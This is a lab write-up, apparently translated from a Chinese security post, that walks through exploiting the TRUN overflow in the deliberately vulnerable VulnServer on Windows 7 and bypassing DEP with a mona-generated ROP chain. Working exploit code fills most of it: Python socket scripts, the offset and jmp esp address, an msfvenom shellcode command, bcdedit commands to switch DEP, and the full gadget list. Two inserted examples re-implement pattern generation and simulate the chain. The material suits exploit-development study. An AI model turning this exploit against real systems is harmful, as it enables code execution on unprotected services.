1. Project name
ROP bypass of Data Execution Prevention (Bypass DEP)
2. Objective
Understand how, with DEP enabled in the operating system, ROP can be used to bypass DEP and hijack the program's control flow.
3. Content
The target is a Windows 7 machine with DEP enabled. Against the TRUN command of the vulnerable server VulnServer, carry out vulnerability discovery, analysis and exploitation.
4. Requirements
1) Understand the basic principle of DEP and how it is enabled;
2) Understand the principle and method of bypassing DEP with ROP.
5. Method and steps
Target: Win7
Attacker: Kali Linux
1) Normal flow
1.1) Trigger the crash
On the target, start VulnServer first.
On Kali, write 1.py and run it to send the data.
import socket

# 5000 bytes of filler; enough to overwrite the saved return address of the TRUN handler
buffer = b"A" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.110.146', 9999))
s.send(b'TRUN .:/ ' + buffer + b'\r\n')
s.recv(1024)
s.send(b'EXIT\r\n')
s.close()
The crash is triggered; EIP now holds 41414141.
1.2) Locate the offset
msf-pattern_create -l 5000
Use Kali to generate a 5000-byte unique pattern, then modify the code so that buffer holds the pattern.
Run the code to send the packet.
Then use mona to look up the offset, which is 2003:
!mona findmsp
Then modify the code:
buffer = b"A" * 2003 + b"BBBB" + b"C" * (5000 - 2003 - 4)
Run the code to send the packet and trigger the crash again.
EIP is indeed 42424242, so the offset is 2003.
1.3) Rule out bad characters
!mona ba -b "\x00"
mona generates the bad-character array badchar; then change buffer to:
buffer = b"A" * 2003 + b"BBBB" + badchar + b"C" * (5000 - 2003 - 4 - len(badchar))
Run the code again to send the packet and trigger the crash.
Only "\x00" turns out to be a bad character.
1.4) Find a jmp esp instruction
Use mona to list them:
!mona jmp -r esp
Pick any one; here 0x625011bb is used.
Modify the code: buffer = b"A" * 2003 + b"\xbb\x11\x50\x62" + b"C" * (5000 - 2003 - 4)
Set a breakpoint at 0x625011bb in the program, then run the code, send the data and trigger the crash.
The jump succeeds.
1.5) Write the shellcode
msfvenom -p windows/exec CMD="calc.exe" -b "\x00" -f python -v shellcode
msfvenom generates shellcode that pops the calculator.
Modify buffer = b"A" * 2003 + b"\xbb\x11\x50\x62" + b"\x90" * 16 + shellcode + b"C" * (5000 - 2003 - 4 - 16 - len(shellcode))
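Added example, not code from the original post: a re-implementation of the cyclic pattern that msf-pattern_create emits and of the lookup mona findmsp performs, so the offset of 2003 from step 1.2 can be reproduced without Metasploit or a debugger. The crash value used in the demo is constructed from the pattern itself, since the post does not quote the EIP value it saw.

```python
import struct

# Added example (not the page's code): msf-pattern_create's sequence and the
# EIP-to-offset lookup that mona findmsp performs.


def pattern_create(length):
    """'Aa0Aa1...Aa9Ab0...' exactly as msf-pattern_create builds it.
    Every 3-byte triple is unique up to 20280 bytes; longer requests stop there."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip):
    """Offset in the pattern of the 4 bytes now in EIP, or -1 if they are not there.
    The debugger shows EIP as a little-endian dword, so pack it back to byte order
    before searching (this is what msf-pattern_offset / mona findmsp do)."""
    return pattern.find(struct.pack("<I", eip))


if __name__ == "__main__":
    pat = pattern_create(5000)
    # Constructed crash value: the dword the TRUN overflow places in EIP at offset 2003.
    crashed_eip = struct.unpack("<I", pat[2003:2007])[0]
    print(hex(crashed_eip), pattern_offset(pat, crashed_eip))
```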
2) Enable DEP on the target
2.1) Enable DEP
Command to enable DEP: in a cmd prompt started as administrator, run bcdedit.exe /set {current} nx AlwaysOn (followed by pause if run from a batch file), then reboot the target.
Command to disable DEP: bcdedit.exe /set {current} nx AlwaysOff (again followed by pause in a batch file), then reboot the target.
If that does not work, open the DEP settings page in Control Panel and enable it there.
Then reboot.
After enabling DEP, start the program and run the code on Kali: execution jumps to the shellcode, but the shellcode cannot execute.
2.2) Generate the ROP chain
Use mona to generate it:
!mona rop generates the file ropchain.txt, but the first entry in its Python section is 00000000.
!mona rop -m *.dll -n -cpb "\x00" generates the chain without that 00 entry; use this command instead.
import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        #[---INFO:gadgets_to_set_esi:---]
        0x75a41a3a,  # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR
        0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
        0x764e686a,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll] ** REBASED ** ASLR
        0x764ef6c9,  # XCHG EAX,ESI # RETN [RPCRT4.dll] ** REBASED ** ASLR
        #[---INFO:gadgets_to_set_ebp:---]
        0x77bf8c9d,  # POP EBP # RETN [ntdll.dll] ** REBASED ** ASLR
        0x77732273,  # & jmp esp [NSI.dll] ** REBASED ** ASLR
        #[---INFO:gadgets_to_set_ebx:---]
        0x7684131e,  # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x7651b7d6,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
        0x76512015,  # PUSH EAX # ADD AL,5E # POP EBX # RETN [RPCRT4.dll] ** REBASED ** ASLR
        #[---INFO:gadgets_to_set_edx:---]
        0x76841ee1,  # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7649f3ea,  # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
        0x77b7f1c0,  # XCHG EAX,EDX # RETN [ntdll.dll] ** REBASED ** ASLR
        #[---INFO:gadgets_to_set_ecx:---]
        0x75a93a04,  # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR
        0x62504739,  # &Writable location [essfunc.dll]
        #[---INFO:gadgets_to_set_edi:---]
        0x764af22c,  # POP EDI # RETN [RPCRT4.dll] ** REBASED ** ASLR
        0x7649f3ec,  # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
        #[---INFO:gadgets_to_set_eax:---]
        0x764d0bb2,  # POP EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
        0x90909090,  # nop
        #[---INFO:pushad:---]
        0x764b8dce,  # PUSHAD # RETN [RPCRT4.dll] ** REBASED ** ASLR
    ]
    # pack each gadget as a little-endian dword so the chain lies on the stack in order
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
Modify buffer = b"\x41" * 2003 + rop_chain + b"\x90" * 16 + shellcode + b"\x43" * (5000 - 2003 - len(rop_chain) - 16 - len(shellcode))
Run the code; the calculator pops up.
Exploitation succeeded.
Reference on how DEP works: Data Execution Prevention (DEP) is a security mechanism designed to prevent malicious code from executing in specific memory regions of the computer. It marks certain memory regions as "non-executable", which stops an attacker from injecting and executing malicious code in those regions. - suv789 - 博客园 (cnblogs)
Reference on how ROP works: 基本 ROP (Basic ROP) - CTF Wiki
Originally published on the WeChat public account 泷羽Sec-Cicdl: ROP 绕过数据执行保护(Bypass DEP)
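Added example, not code from the original post: a register-level walk through the mona chain above that reconstructs the VirtualProtect call it assembles (PAGE_EXECUTE_READWRITE on a stack address, returning into jmp esp), which is the call shape that caller-check and stack-pivot mitigations inspect on the defensive side. Gadget semantics come from mona's own comments; VIRTUALPROTECT and STACK_BASE are constructed placeholders, and because mona marks the gadgets REBASED/ASLR the addresses are only valid for the session in which they were collected.

```python
# Added example (not the page's code): walk the mona chain register by register.
VIRTUALPROTECT = 0x7c801ad4   # constructed placeholder: the real address is not on the page
STACK_BASE = 0x0018f000       # constructed placeholder: ESP when the first gadget returns

# (address, effect) as mona annotated them; "raw" entries are data popped by the gadget before.
CHAIN = [
    (0x75a41a3a, "pop eax"), (0x6250609c, "raw"),   # IAT slot holding &VirtualProtect
    (0x764e686a, "mov eax,[eax]"), (0x764ef6c9, "xchg eax,esi"),
    (0x77bf8c9d, "pop ebp"), (0x77732273, "raw"),   # jmp esp: becomes the return address
    (0x7684131e, "pop eax"), (0xfffffdff, "raw"),
    (0x7651b7d6, "neg eax"), (0x76512015, "push eax; add al,0x5e; pop ebx"),
    (0x76841ee1, "pop eax"), (0xffffffc0, "raw"),
    (0x7649f3ea, "neg eax"), (0x77b7f1c0, "xchg eax,edx"),
    (0x75a93a04, "pop ecx"), (0x62504739, "raw"),   # writable dword for lpflOldProtect
    (0x764af22c, "pop edi"), (0x7649f3ec, "raw"),   # RETN (ROP NOP)
    (0x764d0bb2, "pop eax"), (0x90909090, "raw"),
    (0x764b8dce, "pushad"),
]


def simulate_chain():
    """Run CHAIN gadget by gadget; return the stdcall frame that PUSHAD # RETN leaves."""
    regs = dict(eax=0, ebx=0, ecx=0, edx=0, esi=0, edi=0, ebp=0)
    stack = [addr for addr, _ in CHAIN]                 # the chain as it lies in memory
    ops = {addr: op for addr, op in CHAIN if op != "raw"}
    mem = {0x6250609c: VIRTUALPROTECT}                  # constructed IAT contents
    esp = STACK_BASE

    def pop():
        nonlocal esp
        val = stack[(esp - STACK_BASE) // 4]
        esp += 4
        return val

    while True:
        op = ops[pop()]                                 # every gadget ends in RETN
        if op.startswith("pop "):
            regs[op[4:]] = pop()
        elif op == "mov eax,[eax]":
            regs["eax"] = mem[regs["eax"]]
        elif op.startswith("xchg eax,"):
            other = op[9:]
            regs["eax"], regs[other] = regs[other], regs["eax"]
        elif op == "neg eax":                           # 0xfffffdff -> 0x201, 0xffffffc0 -> 0x40, no null bytes
            regs["eax"] = -regs["eax"] & 0xffffffff
        elif op.startswith("push eax"):                 # EBX gets EAX as pushed, before ADD AL alters it
            regs["ebx"] = regs["eax"]
            regs["eax"] = (regs["eax"] & ~0xff) | ((regs["eax"] + 0x5e) & 0xff)
        elif op == "pushad":
            break
    # PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI; RETN pops EDI (a RETN gadget), which pops
    # ESI, so VirtualProtect starts with EBP as its return address and ESP,EBX,EDX,ECX as arguments.
    return {"callee": regs["esi"], "return_to": regs["ebp"], "lpAddress": esp,
            "dwSize": regs["ebx"], "flNewProtect": regs["edx"],   # 0x201 bytes, 0x40 = PAGE_EXECUTE_READWRITE
            "lpflOldProtect": regs["ecx"],
            "first_bytes_run": regs["eax"]}  # 0x90909090 sits at ESP when jmp esp fires after the stdcall return
```

lpAddress is the original ESP, which points at the 16-byte NOP sled and the shellcode that follow the chain in the buffer; the 0x201-byte window is what gets re-protected.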